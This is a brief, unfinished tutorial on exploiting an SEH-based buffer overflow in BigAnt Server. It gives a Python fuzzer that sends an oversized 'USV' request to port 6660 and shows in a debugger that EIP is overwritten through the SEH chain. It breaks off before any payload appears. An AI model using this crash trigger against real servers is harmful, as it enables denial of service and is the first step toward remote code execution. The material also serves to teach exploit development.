As we know that BigAnt Server compiled with SEH and safeSEH, in this tutorial I'm going to show you how to exploitation this application.
Fuzzing :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
run this fuzzer and see what happens..in Ollydbg
But, EIP not overwrite with our fuzzer, because this application compiled with SEH and safeSEH. T
o look into SEH, select view+SEH chain.
So, press shift+F9 button to forward our fuzzer in to EIP.
In the figure above, we can see that EIP overwrite with 41414141, where this characters comes from the fuzzer.
To be continue...^_^